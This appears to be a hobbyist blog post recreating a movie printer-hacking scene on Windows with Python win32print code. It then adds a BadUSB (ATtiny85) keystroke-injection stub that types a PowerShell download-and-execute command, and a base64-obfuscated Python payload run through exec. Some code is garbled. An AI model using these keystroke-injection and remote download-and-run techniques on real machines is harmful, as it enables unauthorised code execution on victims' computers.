Published in


How I recreated an iconic hacking scene exploiting several printers

From the movie “Who Am I — No System is Safe”


I don’t know of other “hackers”, but I am a total n00b when it comes to
“must watch hacking movies/series”

Yeah. I do. Shut up.

The (pre) Plot

As I entered college, a friend of mine forced me to watch
“The Social Network” on the very second day, and frankly, I loved it!
I don’t know how it affected me, but I’m sure it added a cool GIF to my arsenal. (and you’ll see it, soon)

Thereafter, I’ve seen few. (I can’t forget Mr. Robot, dying for the fourth season)
Recently, I saw “Who Am I — No System is Safe

(subtitles saved my life, saw original (in Russian) aka without dubbing)

Benjamin — a lonely computer expert — meets the charismatic Max, and the two of them — along with Max’s friends — form CLAY, a subversive hacker group.

The Real Plot

I loved the movie, and like every movie or book I read, it was time to implement something from the movie to the real world that enhances my knowledge, experience or .. anything in between.
I do it with everything I see or read and I’ll try to share all those stories. soon.
Okay, moving right along. (a line from ‘The Social Network’)

I found the following portion very appealing.

The Fun, printers going crazy

How it all happened?

Here we go ..

The iconic “hacking” scene we all crave for

As I found this interesting, I started my search. I started reading about printers, how they communicate, which protocols are used for information exchange, past research papers on exploiting printers, and all that.

The Boring Reconnaissance Corner

Some languages/protocols that our printers speak :

  • SNMP
  • PostScript
  • LPD
  • IPP
  • Raw
  • SMB

I found ton of interesting things, I bricked my home printer, opened all the parts, ripped the circuitry, and had a lot of fun, and I’ll share my findings.

Late Mr. Home Printer

But, for now, let’s concentrate on the title, which is, re-creating the above scenario in our real world. As you can guess, there are many printers, and, there are many languages, so, there can be drama, a hell lot of drama.

And as you’re 1337 HaX0r, your “exploit sandwich” should work. Period.

Solution ?

Market Share of various major Operating Systems

Bingo. (Benjamin’s favorite word in the movie)

Windows to our rescue

As it has the major share, let’s get our hands dirty abusing windows.
As we can visualize the underlying architecture, the printer talks/interfaces to the computer via it’s own preferred language (PJL, PML, PostScript …), then the computer process it, infers from it.

But, when we click the “print” button, to print our pout-selfie, do you know what happens, in crux ?

My drawing, I know, I am a born artist.

So, instead of attacking the (printer → computer) interface, why not look into the (application → computer) interface ?

Attacking the API

Or maybe just low level interfacing?

Instead of writing a bunch of native C++, why not abstract this layer as well ?
Let’s use a python wrapper that encompasses majority of low level win32 protocols.

After tinkering with win32api for long, scratching my head a couple of times, learning many a things about the win32 protocols, wrappers, COM objects,
I also came to know about another module, named win32print.
After a lot of digging, I finally created the gem, the crown jewel, the
l33t c0d3!

win32api.ShellExecute (
open (tempfile.mktemp (“.txt”), “a”).write (“Inject this!”),
‘“%s”’ % win32print.GetDefaultPrinter (),

This is my Eiffel Tower. This is my Rachmaninoff’s Third. My Pieta. It’s completely elegant, it’s baffling-ly beautiful, and it’s capable of making any printer connected to windows system go crazy. I call it “The Ex-Wife.”

(a reference from Iron Man 2, Thanks Justin Hammer)

Code Tear-down

We can break the code into three major components :
- ShellExecute function (Performs an operation on a specified file)
- printto (Object Verbs)
win32print API and GetDefaultPrinter function

ShellExecute Function

ShellExecute is the code equivalent of a user “double-clicking” a file icon. It causes Windows to work out what application the document file is associated with, launch the program and have it load the document file.

By using ShellExecute, you don’t need to know the name or location of the program that’s registered to a particular file type. Windows takes care of that for you. For example, you can ShellExecute a [.PDF] file and, so long as Reader, Acrobat or some other PDF-reading app is installed, Windows will launch it and load the PDF for you.

Object Verbs

Each command on the shortcut menu is identified in the registry by its verb. These verbs are the same as those used by ShellExecuteEx when launching applications programmatically. (Quick Reference — Launching Applications.)

A verb is a simple text string that is used by the Shell to identify the associated command. Each verb corresponds to the command string used to launch the command in a console window.

List of verbs

Wait a minute! Where’s the actual deal ? The “printto” verb isn’t there in that list!

The printto verb is also canonical but is never displayed. It allows the user to print a file by dragging it to a printer object.

“printto” Object Verb

Right-clicking an object on Microsoft Windows 95 and later systems usually pops up a shortcut menu. This menu contains a list of commands that the user can select to perform various actions on the object. This section is an introduction to shortcut menus for file system objects.

  • Shortcut Menus for File System Objects
  • Shortcut Menu Verbs
  • Extending the Shortcut Menu for a File Class
  • Extending the Shortcut Menu for Predefined Shell Objects
  • Registering an Application to Handle Arbitrary File Classes
  • Extending the New Sub-menu

Kudos : — Mat Baker & Michael “micolous” both helped us to see the under-documented printto verb which takes the printer name as a parameter, enclosed in quotes if it contains spaces.

win32print API

Q-1. Why we need this ?
Answer : — We need an API which can get us access to access the printer at low level.
Q-2. What we need ?
Answer : — Tim Golden’s win32print module looks perfect!

After reading the code, seeing the documentation, I googled and read about various parts/functions.

Get ready for major remodel, fellas!

(another one from Iron Man 2)

Printing text is cool, but what if I want the ditto scene, the ditto document ?

Everybody wants a Ditto! (in Pokemon, obviously, yeah, even Ash Ketchum, see EP037)

Printing document

The win32print module offers (almost) all the printing primitives you’ll need to take some data and throw it at a printer which has already been defined on your system. The data must be in a form which the printer will happily swallow, usually something like text (which we used before) or raw PCL.

Let the hacking begin

The weapon I was talking about ;)

Printing Documents

import win32ui
import win32print
import win32con
hDC = win32ui.CreateDC ()
hDC.CreatePrinterDC (win32print.GetDefaultPrinter ())
hDC.StartDoc (“Injected Doc”)
hDC.StartPage ()
hDC.SetMapMode (win32con.MM_TWIPS)
hDC.DrawText (“HELLO WORLD”, (0, 1440 * -1, 1440 * 8, 1440 * -2), win32con.DT_CENTER)
hDC.EndPage ()
hDC.EndDoc ()

Printing Images

import win32print
import win32ui
from PIL import Image, ImageWin
hDC = win32ui.CreateDC ()
hDC.CreatePrinterDC (win32print.GetDefaultPrinter ())
bmp = Image.open ("whoami.jpg")
hDC.StartDoc ("whoami?")
hDC.StartPage ()
dib = ImageWin.Dib (bmp)
dib.draw (hDC.GetHandleOutput (), (0,0,(hDC.GetDeviceCaps (110), hDC.GetDeviceCaps (111))[0],(hDC.GetDeviceCaps (110), hDC.GetDeviceCaps (111))[1]))
hDC.EndPage ()
hDC.EndDoc ()
hDC.DeleteDC ()

Demo Time!

NOTE: I did all my tests on an isolated laptop which is not connected to printer. So, instead it diverted to “Save PDF” method, that’s why running payloads prompted to save the generated data instead of directly printing it.

Don’t believe those? Great! Go and script it yourself, just don’t print, or maybe print just one (and no Pewdiepie fever, please). Save paper.

Making it even cooler than that Hollywood movie scene!

How about doing all of it without touching any keyboard or thinking of any “programmical” thoughts?

The Prodigal Son Returns!

(this one from Iron Man 3)

Time to introduce our bad boy, the BadUSB! (or maybe Rubber Ducky?)

Actually, it’s none of the above, neither it is the original BadUSB which utilized flaw in Phison 2251–03 (2303) chip-set to patch it with custom firmware making it a programmable killing machine just like USB Rubber Ducky but with a boring cover with no yellow ducks :(

Hold on, let me search my so called ‘lab’ as I am home (summer vacations), … Annd, I found it!

Yes, I watched that Black Hat video in the same year (2014), got crazy as Hak5 doesn’t ships to India (still, checked today) and it was much cooler (technically), broke every pen-drive I had lying around and finally found one, (maybe two) having the same chip-set.

Here’s one similar chip-set, desoldered

Ah, memories ❤

How you used to connect this? (just in case..)

Found in folders, connections to a normal USB, because I broke the USB Male Connector

So, WHAT IS IT ! ?

It’s an ATiny85 (can also use Arduino Uno r3, but it’ll not camouflage as a necklace) micro-controller with patched HID ( human interface device) firmware loaded onto it, making it something like the above two serial killers. (but cheaper, and more less — more technical, less than Phison firmware patching, more than grabbing a USB Rubber Ducky)

The Staged Payload

The code running inside our micro-controller acts as a stub loader.

#include “DigiKeyboard.h”#define KEY_UP_ARROW 0x52
#define KEY_DOWN_ARROW 0x51
#define KEY_LEFT_ARROW 0x50
#define KEY_RIGHT_ARROW 0x4F
void setup() {
void loop() {
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.print(“powershell iex ((New-Object System.Net.WebClient).DownloadString(‘'))");
for(;;){ /*empty*/ }

Final Stage Payload

py -c “import base64;exec(base64.b64decode(‘aW1wb3J0IHdpbjMydWkNCmltcG9ydCB3aW4zMnByaW50DQppbXBvcnQgd2luMzJjb24NCklOQ0ggPSAxNDQwDQpoREMgPSB3aW4zMnVpLkNyZWF0ZURDICgpDQpoREMuQ3JlYXRlUHJpbnRlckRDICh3aW4zMnByaW50LkdldERlZmF1bHRQcmludGVyICgpKQ0KaERDLlN0YXJ0RG9jICgiSW5qZWN0ZWQgRG9jIikNCmhEQy5TdGFydFBhZ2UgKCkNCmhEQy5TZXRNYXBNb2RlICh3aW4zMmNvbi5NTV9UV0lQUykNCmhEQy5EcmF3VGV4dCAoIkhFTExPIFdPUkxELCBieSBAMHg0OHBpcmFqIiwgKDAsIElOQ0ggKiAtMSwgSU5DSCAqIDgsIElOQ0ggKiAtMiksIHdpbjMyY29uLkRUX0NFTlRFUikNCmhEQy5FbmRQYWdlICgpDQpoREMuRW5kRG9jICgp’))”


Victim’s PC

Attacker’s PC


About the Author

Piyush Raj is now a 18 year old college freshmen currently working with OWASP Foundation as a Google Student Developer or say GSoCer. He’s past Google Code-In Contribution Winner, and loves playing football.

You can connect with him over LinkedIn, Twitter, Instagram

Social Jazz.


(I know it’s Medium, but eh.)

  1. Who Am I — No System is Safe
  2. ffmpeg -ss 00:00:00 -i input.mp4 -to 00:00:03 -c copy output.mp4
  3. http://zulko.github.io/moviepy/install.html
  4. https://www.python.org/
  5. http://timgolden.me.uk/pywin32-docs/html/com/win32com/HTML/QuickStartClientCom.html
  6. Printer Protocols — LPD, IPP, Raw, SMB
  7. Printer Languages — PJL, PCL, PostScript
  8. https://docs.microsoft.com/en-us/windows/desktop/shell/launch
  9. mhammond/pywin32/win32print
  10. https://bulbapedia.bulbagarden.net/wiki/EP037



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Piyush Raj ~ Rex

Google Code-In C. Winner. GsOCer ‘19. Independent Security Researcher. Have hacked Medium, Mozilla, Opera & many more. Personal Website: https://0x48piraj.com